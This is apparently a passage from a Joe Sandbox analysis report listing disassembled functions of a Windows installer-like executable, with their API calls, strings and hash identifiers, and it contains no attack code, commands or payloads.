                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ChangeNotify$ErrorFullLastNamePath
                                                                          • String ID: Creating directory: %s
                                                                          • API String ID: 2451617938-483064649
                                                                          • Opcode ID: d0889181267df992a591f3ea40977f34f7a5259987c22db0f3b4d7debd1e95ef
                                                                          • Instruction ID: 5f4869df34387351d22434cdd0714d3fe117de94cd68d5563c6cbe2666c0fa91
                                                                          • Opcode Fuzzy Hash: d0889181267df992a591f3ea40977f34f7a5259987c22db0f3b4d7debd1e95ef
                                                                          • Instruction Fuzzy Hash: DD514174E00248ABDB01DFA5C482BDEB7F5EF48308F50856AE851B7382DB785E44CB99
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00454178 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 41registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
                                                                          • RegCloseKey.ADVAPI32(?,004541E3,?,00000001,00000000), ref: 004541D6
                                                                          Strings
                                                                          • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00454184
                                                                          • PendingFileRenameOperations2, xrefs: 004541B7
                                                                          • PendingFileRenameOperations, xrefs: 004541A8
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen
                                                                          • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                          • API String ID: 47109696-2115312317
                                                                          • Opcode ID: f34624fdd3cb7fddb242984fec9a2046b392dbdee4337d793cbee412e8c9c1b2
                                                                          • Instruction ID: 8e02acf7dda17f65ef86d3b585dbeec974d4a4341a7776fb0aa38c58d509200f
                                                                          • Opcode Fuzzy Hash: f34624fdd3cb7fddb242984fec9a2046b392dbdee4337d793cbee412e8c9c1b2
                                                                          • Instruction Fuzzy Hash: 2EF0F635208608BFD704D6E2DC06A1B77ECD7C5759FB14467F9009F582DE78AE94921C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004211E4 Relevance: 6.1, APIs: 4, Instructions: 127windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetMenu.USER32(00000000), ref: 004212D1
                                                                          • SetMenu.USER32(00000000,00000000), ref: 004212EE
                                                                          • SetMenu.USER32(00000000,00000000), ref: 00421323
                                                                          • SetMenu.USER32(00000000,00000000), ref: 0042133F
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Menu
                                                                          • String ID:
                                                                          • API String ID: 3711407533-0
                                                                          • Opcode ID: 4c00e3b9410a05ce5c81e379d34b9db56685470e430e4bbd06adfeec13cad146
                                                                          • Instruction ID: 48f3a64e559805c9a8555d4ddd453999d2efe8395b615d28906c4a6af38eb170
                                                                          • Opcode Fuzzy Hash: 4c00e3b9410a05ce5c81e379d34b9db56685470e430e4bbd06adfeec13cad146
                                                                          • Instruction Fuzzy Hash: 0141BE307002645BEB20AA7AA88579B37914F65308F4845BFFC44EF3A7CA7CCC4582AD
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00416AB2 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageA.USER32(?,?,?,?), ref: 00416AF4
                                                                          • SetTextColor.GDI32(?,00000000), ref: 00416B0E
                                                                          • SetBkColor.GDI32(?,00000000), ref: 00416B28
                                                                          • CallWindowProcA.USER32(?,?,?,?,?), ref: 00416B50
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Color$CallMessageProcSendTextWindow
                                                                          • String ID:
                                                                          • API String ID: 601730667-0
                                                                          • Opcode ID: 1d3cbda9518b2ce12e9cd07cc94b211126e19477f7e649d954dcb8d793c07e3f
                                                                          • Instruction ID: c000e8b01db0500dd6874d208778bcf8efa3d9016d5589f965051e8255cd057a
                                                                          • Opcode Fuzzy Hash: 1d3cbda9518b2ce12e9cd07cc94b211126e19477f7e649d954dcb8d793c07e3f
                                                                          • Instruction Fuzzy Hash: 74115EB2604604AFC710EE6ECC84E8777ECEF49710B15886BB55ADB652C638FC418B79
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004239F4 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • EnumWindows.USER32(0042398C), ref: 00423A18
                                                                          • GetWindow.USER32(?,00000003), ref: 00423A2D
                                                                          • GetWindowLongA.USER32(?,000000EC), ref: 00423A3C
                                                                          • SetWindowPos.USER32(00000000,004240CC,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,0042411B,?,?,00423CE3), ref: 00423A72
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Window$EnumLongWindows
                                                                          • String ID:
                                                                          • API String ID: 4191631535-0
                                                                          • Opcode ID: 8ff7365b5520c72616fb03b6a0c4256d91edd785515c56340625f2feabb98e97
                                                                          • Instruction ID: 5fb1b4c26b7281e556a96b269d9e57b3a313a4882f561b886cf0e087050bba11
                                                                          • Opcode Fuzzy Hash: 8ff7365b5520c72616fb03b6a0c4256d91edd785515c56340625f2feabb98e97
                                                                          • Instruction Fuzzy Hash: 45115A70700610ABDB10EF68DC85F5A77E8EB48725F11026AF9A4AB2E2C37CDC41CB58
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00423038 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • 73A1A570.USER32(00000000,?,?,00000000,?,00418F43,00000000,?,?,?,00000001), ref: 0042308E
                                                                          • EnumFontsA.GDI32(00000000,00000000,00422FD8,004105C0,00000000,?,?,00000000,?,00418F43,00000000,?,?,?,00000001), ref: 004230A1
                                                                          • 73A24620.GDI32(00000000,0000005A,00000000,00000000,00422FD8,004105C0,00000000,?,?,00000000,?,00418F43,00000000), ref: 004230A9
                                                                          • 73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00422FD8,004105C0,00000000,?,?,00000000,?,00418F43,00000000), ref: 004230B4
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: A24620A480A570EnumFonts
                                                                          • String ID:
                                                                          • API String ID: 2630238358-0
                                                                          • Opcode ID: 0130a543140e80f2b9f86b8e83a342749db33d5760528b3305e50fe7c2cc1c24
                                                                          • Instruction ID: 4d68480f6d607538855b0f171b38ffa839f5ce6e0578d669e72114bdc8101102
                                                                          • Opcode Fuzzy Hash: 0130a543140e80f2b9f86b8e83a342749db33d5760528b3305e50fe7c2cc1c24
                                                                          • Instruction Fuzzy Hash: 0601D2616053002AE700BF6A5C82B9B37649F00709F40027BF804AF2C7D6BE9805476E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004536EC Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • WaitForInputIdle.USER32(00000001,00000032), ref: 00453718
                                                                          • MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 0045373A
                                                                          • GetExitCodeProcess.KERNEL32(00000001,00000001), ref: 00453749
                                                                          • CloseHandle.KERNEL32(00000001,00453776,0045376F,?,00000031,00000080,00000000,?,?,00453AC7,00000080,0000003C,00000000,00453ADD), ref: 00453769
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                                          • String ID:
                                                                          • API String ID: 4071923889-0
                                                                          • Opcode ID: ddcdf6928b028788f19173831482d9f32cfd0fe6233734d9ccef482c6c221cba
                                                                          • Instruction ID: 9fccd2aefca3528e48b7c7924445ec13d0cbcd302fba8438f8af89f39fd4f237
                                                                          • Opcode Fuzzy Hash: ddcdf6928b028788f19173831482d9f32cfd0fe6233734d9ccef482c6c221cba
                                                                          • Instruction Fuzzy Hash: 6001F9F0E006087EEB209BA58C02F6BBA9CDB0D7A1F504567B904D32C2D6785E008668
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00406284 Relevance: 6.0, APIs: 4, Instructions: 11memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GlobalHandle.KERNEL32 ref: 00406287
                                                                          • GlobalUnWire.KERNEL32(00000000), ref: 0040628E
                                                                          • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00406293
                                                                          • GlobalFix.KERNEL32(00000000), ref: 00406299
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Global$AllocHandleWire
                                                                          • String ID:
                                                                          • API String ID: 2210401237-0
                                                                          • Opcode ID: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
                                                                          • Instruction ID: ad050c8fb554795a0ca7e59246f03ac17dd57b6c6051e6027a9978793207e39e
                                                                          • Opcode Fuzzy Hash: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
                                                                          • Instruction Fuzzy Hash: A0B009C5814A05B9EC0833B24C0BD3F141CD88072C3808A6FB458BA1839C7C9C402A3D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0045A588 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 166COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0044FE04: SetEndOfFile.KERNEL32(?,?,0045A666,00000000,0045A7F1,?,00000000,00000002,00000002), ref: 0044FE0B
                                                                          • FlushFileBuffers.KERNEL32(?), ref: 0045A7BD
                                                                          Strings
                                                                          • EndOffset range exceeded, xrefs: 0045A6F1
                                                                          • NumRecs range exceeded, xrefs: 0045A6BA
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: File$BuffersFlush
                                                                          • String ID: EndOffset range exceeded$NumRecs range exceeded
                                                                          • API String ID: 3593489403-659731555
                                                                          • Opcode ID: d10465de438f0d9a20d62f3af6b3d551a4455012a7dd22e12cedccbfc0f573d8
                                                                          • Instruction ID: 2b961db3f5bdd9156690fc13548013475d80f4f35adf24b78551c01bb99683a1
                                                                          • Opcode Fuzzy Hash: d10465de438f0d9a20d62f3af6b3d551a4455012a7dd22e12cedccbfc0f573d8
                                                                          • Instruction Fuzzy Hash: 6B61B634A002948FDB24DF25C880BDAB7B5EF49305F0085EAED889B352D674AEC9CF15
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0049292C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,0049293A), ref: 0040334B
                                                                            • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,0049293A), ref: 00403356
                                                                            • Part of subcall function 00409AE8: 6F571CD0.COMCTL32(00492949), ref: 00409AE8
                                                                            • Part of subcall function 004108C4: GetCurrentThreadId.KERNEL32 ref: 00410912
                                                                            • Part of subcall function 00418FB0: GetVersion.KERNEL32(0049295D), ref: 00418FB0
                                                                            • Part of subcall function 0044EFD8: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00492971), ref: 0044F013
                                                                            • Part of subcall function 0044EFD8: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F019
                                                                            • Part of subcall function 00451B74: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00451C0D,?,?,?,?,00000000,?,0049297B), ref: 00451B94
                                                                            • Part of subcall function 00451B74: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00451B9A
                                                                            • Part of subcall function 00451B74: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00451C0D,?,?,?,?,00000000,?,0049297B), ref: 00451BAE
                                                                            • Part of subcall function 00451B74: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00451BB4
                                                                            • Part of subcall function 00460AF4: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,0049298F), ref: 00460B03
                                                                            • Part of subcall function 00460AF4: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00460B09
                                                                            • Part of subcall function 00468898: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 004688AD
                                                                            • Part of subcall function 00473B70: GetModuleHandleA.KERNEL32(kernel32.dll,?,00492999), ref: 00473B76
                                                                            • Part of subcall function 00473B70: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00473B83
                                                                            • Part of subcall function 00473B70: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00473B93
                                                                            • Part of subcall function 0048FAC4: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 0048FADD
                                                                          • SetErrorMode.KERNEL32(00000001,00000000,004929E1), ref: 004929B3
                                                                            • Part of subcall function 0049273C: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,004929BD,00000001,00000000,004929E1), ref: 00492746
                                                                            • Part of subcall function 0049273C: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0049274C
                                                                            • Part of subcall function 00424444: SendMessageA.USER32(?,0000B020,00000000,?), ref: 00424463
                                                                            • Part of subcall function 00424234: SetWindowTextA.USER32(?,00000000), ref: 0042424C
                                                                          • ShowWindow.USER32(?,00000005,00000000,004929E1), ref: 00492A24
                                                                            • Part of subcall function 0047CB54: SetActiveWindow.USER32(?), ref: 0047CBF8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$HandleModule$Window$ActiveClipboardCommandCurrentErrorF571FormatLibraryLineLoadMessageModeRegisterSendShowTextThreadVersion
                                                                          • String ID: Setup
                                                                          • API String ID: 4284711697-3839654196
                                                                          • Opcode ID: 639ba3783921b247417bcefc2a0b3e3d8b803f8c75a70ac499f6ae3d48694326
                                                                          • Instruction ID: eded0d4357af90f477a459f2b01769dd77d742874e450745c10b4ef5d55a2914
                                                                          • Opcode Fuzzy Hash: 639ba3783921b247417bcefc2a0b3e3d8b803f8c75a70ac499f6ae3d48694326
                                                                          • Instruction Fuzzy Hash: C33115722046006FD601BBB7ED5395D3B98EBC9719B62457FF40492A93CE7C5C418A3E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004523A8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00452497,?,?,00000000,00494628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004523EE
                                                                          • GetLastError.KERNEL32(00000000,00000000,?,00000000,00452497,?,?,00000000,00494628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004523F7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CreateDirectoryErrorLast
                                                                          • String ID: .tmp
                                                                          • API String ID: 1375471231-2986845003
                                                                          • Opcode ID: 4a0e093c0516768d85d3f1ab6189cfbf3f3e2d31e0be1d7e979444a92c8dfe51
                                                                          • Instruction ID: f2a91aa9b7c92abf08b1cf9804f586f67492acd5f2b8aa702b6c2495f1d600d0
                                                                          • Opcode Fuzzy Hash: 4a0e093c0516768d85d3f1ab6189cfbf3f3e2d31e0be1d7e979444a92c8dfe51
                                                                          • Instruction Fuzzy Hash: EF216574A002089BDB01EFA1C9429DFB7B9EF49305F50447BEC01B7342DA7C9E048AA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0045116C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60processCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateProcessA.KERNEL32(00000000,00000000,?,?,0aE,00000000,00456118,?,?,?,00000000,004511E6,?,?,?,00000001), ref: 004511C0
                                                                          • GetLastError.KERNEL32(00000000,00000000,?,?,0aE,00000000,00456118,?,?,?,00000000,004511E6,?,?,?,00000001), ref: 004511C8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CreateErrorLastProcess
                                                                          • String ID: 0aE
                                                                          • API String ID: 2919029540-2709181307
                                                                          • Opcode ID: e3d63d6d3609c0b896b47cbe3e6c70e55163f3a5d4d5f4b272d250c12acc0d6d
                                                                          • Instruction ID: ba1904f8ad5b396da002b91a84b6289d0307b3cc7d8e26f05fe7202b1d1cf5f2
                                                                          • Opcode Fuzzy Hash: e3d63d6d3609c0b896b47cbe3e6c70e55163f3a5d4d5f4b272d250c12acc0d6d
                                                                          • Instruction Fuzzy Hash: 5F115A72A04608AF8B40CEA9DC81E9B77ECEB4C350B1145A6FE08D3251D634AD14CB64
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00477198 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047741E,00000000,00477434,?,?,?,?,00000000), ref: 004771FA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID: RegisteredOrganization$RegisteredOwner
                                                                          • API String ID: 3535843008-1113070880
                                                                          • Opcode ID: 85432a3ed76ad868fb852c58816c2db2475bea01b49da00295727814efd58def
                                                                          • Instruction ID: 251e4fb5afb05e097686391082de11908fc67083b0d73a84a082d7502db0c793
                                                                          • Opcode Fuzzy Hash: 85432a3ed76ad868fb852c58816c2db2475bea01b49da00295727814efd58def
                                                                          • Instruction Fuzzy Hash: 26F0BB30708244AFDB11DBA59C52B9B375DD741304FA080BBF104DB382D6799D01C75C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00470A40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00470C77), ref: 00470A65
                                                                          • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00470C77), ref: 00470A7C
                                                                            • Part of subcall function 00451E20: GetLastError.KERNEL32(00000000,00452891,00000005,00000000,004528C6,?,?,00000000,00494628,00000004,00000000,00000000,00000000,?,004921BD,00000000), ref: 00451E23
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateErrorFileHandleLast
                                                                          • String ID: CreateFile
                                                                          • API String ID: 2528220319-823142352
                                                                          • Opcode ID: 7e28141043a3e0f576738c48cd57d39c8717062d9e0e2e81c58d16874d68a086
                                                                          • Instruction ID: f059ad179e7cc864c024b880cb83de53b773c1d1f6c265ff80624fd6f5be5d41
                                                                          • Opcode Fuzzy Hash: 7e28141043a3e0f576738c48cd57d39c8717062d9e0e2e81c58d16874d68a086
                                                                          • Instruction Fuzzy Hash: 86E06D74351304BBEA10E669CCC6F4A77889B18768F10C152FA59AF3E2C5B9EC40861C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00468898 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0042E1F0: SetErrorMode.KERNEL32(00008000), ref: 0042E1FA
                                                                            • Part of subcall function 0042E1F0: LoadLibraryA.KERNEL32(00000000,00000000,0042E244,?,00000000,0042E262,?,00008000), ref: 0042E229
                                                                          • GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 004688AD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AddressErrorLibraryLoadModeProc
                                                                          • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                          • API String ID: 2492108670-2683653824
                                                                          • Opcode ID: 7d9e8a1c9394b5a8d7c81de7f260a8a70e759d715e8b294ff61618bd829d2d70
                                                                          • Instruction ID: 6cffaa682af11576deed02c6796eeeee027c815ce59d8c7ab8a1b116f7f65a8a
                                                                          • Opcode Fuzzy Hash: 7d9e8a1c9394b5a8d7c81de7f260a8a70e759d715e8b294ff61618bd829d2d70
                                                                          • Instruction Fuzzy Hash: 43B092F0A8071286DA0077B69842B1B2204D7D0708BE0897F7044BB289EE7C84054B9E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0047C208 Relevance: 4.6, APIs: 3, Instructions: 98windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
